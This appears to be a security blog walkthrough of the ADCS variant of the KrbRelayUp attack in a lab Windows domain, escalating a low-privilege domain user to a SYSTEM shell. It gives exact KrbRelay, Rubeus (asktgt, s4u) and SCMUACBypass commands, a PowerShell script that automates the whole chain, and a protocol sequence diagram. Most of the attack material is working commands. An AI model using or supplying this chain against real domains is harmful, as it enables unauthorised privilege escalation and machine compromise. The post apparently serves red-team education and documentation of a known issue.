Home KrbRelay with ADCS Web Enrollment

KrbRelay with ADCS Web Enrollment


KrbRelayUp is a tool that exploits a no-fix local privilege escalation (from domain user to SYSTEM) issue in Windows domain environments by relaying Kerberos authentication over some network protocols (LDAP or HTTP). More information about the issue can be found at Windows Exploitation Tricks: Relaying DCOM Authentication.

KrbRelayUp has three exploitation methods (RBCD, Shadow credentials and ADCS). The first two have a writeup, linked in the KrbRelayUp repository, on how to perform the attack using the original tools:

We (Victor Campos and me) decided to write one for ADCS and fill that gap.

Previous requirements

A Windows domain environment where:

  • Active Directory Certificate Services (ADCS) is enabled, and
  • The Certification Authority (CA) server does not enforce the use of TLS and Extended Protection for Authentication (EPA).

Tools to execute the attack:

Step 1: Check current user information and tickets

We start with a low-privilege domain user who belongs only to the “Domain Users” group:

net user lowpriv /domain

lowpriv domain information

At this time, lowpriv has no Kerberos tickets:


No tickets

Step 2: Get a certificate for the local machine

CheckPort provides a free TCP port where KrbRelay can start an RPC server on the local machine (wks.lab.local):


Port 10246 is available

Next, we run KrbRelay to:

  • coerce the local machine to authenticate to the CA server (cs.lab.local) using Kerberos, but sending the AP-REQ to the local RPC server (port 10246), and then
  • relay the authentication (Service Ticket or ST) to the CA server, impersonating the local machine and requesting a certificate on its behalf.
.\KrbRelay.exe -spn http/CS.lab.local -endpoint certsrv -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -adcs Machine -port 10246

HTTP authentication Get a certificate

certsrv is the HTTP endpoint for requesting certificates on the CA server.

Machineis the default certificate template name for domain workstations and servers.

90f18417-f0f1-484e-9d3c-59dceee5dbd8 is the CLSID that identifies the ActiveX Installer Service (AxInstSV) DCOM object class, which has the impersonation level set to RPC_C_IMP_LEVEL_IMPERSONATE and the authentication level set to RPC_C_AUTHN_LEVEL_CONNECT. For this attack method (ADCS), other CLSIDs can be used if they have the the same values or the authentication level set to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY.

Step 3: Get a TGT for the local machine

Now, we run Rubeus to request a TGT for the local machine, after using the certificate during PKINIT authentication.

.\rubeus.exe asktgt /user:WKS$ /certificate:MIACA...EAAAA /enctype:AES256 /nowrap

Command execution Get a TGT

Step 4: Get a ST for a local administrator

Using the TGT, we run Rubeus again, but this time to make a S4U2self request to acquire an ST for the SPN host/wks.lab.local impersonating a domain user. The domain user will be the domain administrator, but could be any domain user with local administrator privileges.

.\rubeus.exe s4u /self /user:WKS$ /impersonateuser:administrator /altservice:host/WKS /ptt /ticket:doIF6...NhbA== /nowrap

Command execution Get a ST

Step 5: Check current tickets

At this time, lowpriv has an ST and can impersonate the domain administrator when accessing the SPN host/wks.lab.local:


ST is available

Step 6: Get a SYSTEM shell

Finally, we run SCMUACBypass to authenticate to the Service Control Manager using the ST, create a service called “UacBypassedService” and then start it to get a SYSTEM shell:


Command execution

Step 7: Clean up

To remove the newly created service, we run either of the two commands below from a local administrator shell:

sc.exe delete UacBypassedService
(Get-WmiObject -Class Win32_Service -Filter "Name='UacBypassedService'").delete()

Bonus 1: Automate the process

Code snippet with the variables at the top, the commands, and the parsed output, to speed up the whole process.

$port = 10246
$spn = "http/cs.lab.local"
$clsid = "90f18417-f0f1-484e-9d3c-59dceee5dbd8"
$user = "wks$"
$admin = "administrator"
$krbrelay = .\KrbRelay.exe -spn $spn -endpoint certsrv -clsid $clsid -adcs Machine -port $port
$certificate = $krbrelay[-1]
$asktgt = .\rubeus.exe asktgt /user:$user /certificate:$certificate /enctype:AES256 /nowrap
$tgt = $asktgt[18].TrimStart()
$altservice = "host/" + $user.Substring(0,$user.length - 1)
$s4u = .\rubeus.exe s4u /self /user:$user /impersonateuser:$admin /altservice:$altservice /ptt /ticket:$tgt /nowrap
$shell = .\SCMUACBypass.exe

Code snippet

Bonus 2: Sequence diagram

Key interactions between the parties that occur after the attacker executes each command:

    participant LR as Local RPC Server
    participant LD as Local DCOM Server
    participant LA as Local Attacker
    participant LW as Local Win API
    participant CA as Certification Authority
    participant KS as Kerberos Server
    Note right of LA: KrbRelay
    activate LA
    LA->>LW: CoGetInstanceFromIStorage
    activate LW
    deactivate LW
    activate LD
    LD->LR: IOXIDResolver +<br>NTLM Authentication
    activate LR
    LD->>LR: IOXIDResolver::ResolveOxid2<br>request
    LR->>LD: IOXIDResolver::ResolveOxid2<br>reply (string/security bindings)
    deactivate LR
    LD->>KS: AS-REQ
    activate KS
    KS->>LD: AS-REP (WKS$ TGT)
    KS->>LD: TGS-REP (WKS$ ST)
    deactivate KS
    LD->>LA: IRemUnknown2<br>AP-REQ (WKS$ ST)<br>HTTP/CS.LAB.LOCAL
    deactivate LD
    LA->>CA: GET /certsrv/certnew.cer (WKS$ ST)
    activate CA
    CA->>LA: WKS$ certificate
    deactivate CA
    deactivate LA
    Note right of LA: Rubeus
    LA->>KS: AS-REQ (WKS$ certificate)
    activate LA
    activate KS
    KS->>LA: AS-REP (WKS$ TGT)
    LA->>KS: S4U2self - Administrator ST for HOST/WKS$
    KS->>LA: Administrator ST
    deactivate KS
    deactivate LA
    Note right of LA: SCMUACBypass
    LA->>LW: OpenSCManager +<br>CreateService +<br>StartService(Payload) 
    activate LA
    activate LW
    activate LR
    deactivate LA
    deactivate LW
    deactivate LR
    Note right of LA: SYSTEM shell
This post is licensed under CC BY 4.0 by the author.

